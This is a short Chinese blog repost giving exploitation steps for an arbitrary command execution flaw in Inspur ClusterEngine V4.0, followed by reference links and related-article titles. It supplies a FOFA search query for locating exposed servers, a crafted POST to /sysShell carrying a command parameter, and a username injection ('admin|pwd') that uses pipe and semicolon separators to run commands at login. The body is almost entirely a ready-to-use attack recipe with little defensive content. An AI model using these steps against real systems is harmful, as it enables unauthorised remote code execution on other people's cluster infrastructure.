1、浪潮ClusterEngineV4.0 任意命令执行

影响版本 ClusterEngineV4.0

2、漏洞影响

远程代码执行

fofa语句 title='TSCEV4.0'

抓包构造exp

POST /sysShel

......

op=doPlease&node=cu01&command=ls

登录抓包，闭合username参数

使用;进行命令分割

用户名输入admin|pwd,密码任意

成功登录

https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul

https://blog.csdn.net/DUANYU23/article/details/115499280

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 任意命令执行深信服EDR命令执行&任意用户登录 PbootCMS任意代码执行任意代码执行漏洞渗透技巧——如何逃逸Linux的受限制shell执行任意命令 CVE-2018-19518 PHP imap_open函数任意命令执行漏洞复现我写了一个脚本，可在“任意”服务器上执行命令！ Fastjson 1.2.24、47 反序列化导致任意命令执行漏洞复现 fastjson 1.2.24反序列化导致任意命令执行漏洞分析记录关于Fastjson 1.2.24 反序列化导致任意命令执行漏洞